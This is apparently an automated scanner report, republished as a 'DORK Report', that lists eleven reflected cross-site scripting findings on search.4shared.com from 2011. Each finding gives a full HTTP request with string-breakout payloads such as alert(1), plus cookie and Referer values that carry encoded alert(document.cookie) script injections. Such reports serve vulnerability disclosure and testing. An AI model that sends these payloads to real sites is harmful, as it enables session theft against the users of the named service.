XSS, Cross Site Scripting, 4shared.com HTTP Systems Example, DORK Report

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

1.1. http://search.4shared.com/css/common.css [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81082"-alert(1)-"fa1a66483cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css81082"-alert(1)-"fa1a66483cf/common.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css81082"-alert(1)-"fa1a66483cf/common.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:11 GMT
Content-Length: 36953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css81082"-alert(1)-"fa1a66483cf/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.2. http://search.4shared.com/css/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df6c'-alert(1)-'ccf8efc18f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9df6c'-alert(1)-'ccf8efc18f0/common.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css9df6c'-alert(1)-'ccf8efc18f0/common.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:18 GMT
Content-Length: 36965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/css9df6c'-alert(1)-'ccf8efc18f0/common.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.3. http://search.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d3d'-alert(1)-'0b54c3a4ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.css33d3d'-alert(1)-'0b54c3a4ec HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/common.css33d3d'-alert(1)-'0b54c3a4ec
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:27 GMT
Content-Length: 36948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/css/common.css33d3d'-alert(1)-'0b54c3a4ec',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.4. http://search.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2823d"-alert(1)-"5c1c5cba9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.css2823d"-alert(1)-"5c1c5cba9a2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/common.css2823d"-alert(1)-"5c1c5cba9a2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:12 GMT
Content-Length: 36964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/common.css2823d"-alert(1)-"5c1c5cba9a2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.5. http://search.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9bdd'-alert(1)-'99a5e7242ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa9bdd'-alert(1)-'99a5e7242ce/main.css?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /cssa9bdd'-alert(1)-'99a5e7242ce/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:00 GMT
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/cssa9bdd'-alert(1)-'99a5e7242ce/main.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.6. http://search.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bb8"-alert(1)-"0465f9b3ed8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css89bb8"-alert(1)-"0465f9b3ed8/main.css?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css89bb8"-alert(1)-"0465f9b3ed8/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:11:58 GMT
Content-Length: 36943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css89bb8"-alert(1)-"0465f9b3ed8/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.7. http://search.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce7a'-alert(1)-'70d8e48765b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.cssfce7a'-alert(1)-'70d8e48765b?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/main.cssfce7a'-alert(1)-'70d8e48765b
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:12 GMT
Content-Length: 36953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/css/main.cssfce7a'-alert(1)-'70d8e48765b',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.8. http://search.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860a4"-alert(1)-"28ebbe0199e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css860a4"-alert(1)-"28ebbe0199e?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/main.css860a4"-alert(1)-"28ebbe0199e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:10 GMT
Content-Length: 36944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/main.css860a4"-alert(1)-"28ebbe0199e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.9. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3445b'-alert(1)-'adbb9fcfab1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css3445b'-alert(1)-'adbb9fcfab1/mainWithoutCommon.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css3445b'-alert(1)-'adbb9fcfab1/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:22 GMT
Content-Length: 37020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/css3445b'-alert(1)-'adbb9fcfab1/mainWithoutCommon.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.10. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3880"-alert(1)-"5bdfa9fe7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:04 GMT
Content-Length: 37008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.11. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22fb6'-alert(1)-'e9a2e4d0604 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.css22fb6'-alert(1)-'e9a2e4d0604 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/mainWithoutCommon.css22fb6'-alert(1)-'e9a2e4d0604
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:00 GMT
Content-Length: 36321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/css/mainWithoutCommon.css22fb6'-alert(1)-'e9a2e4d0604',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

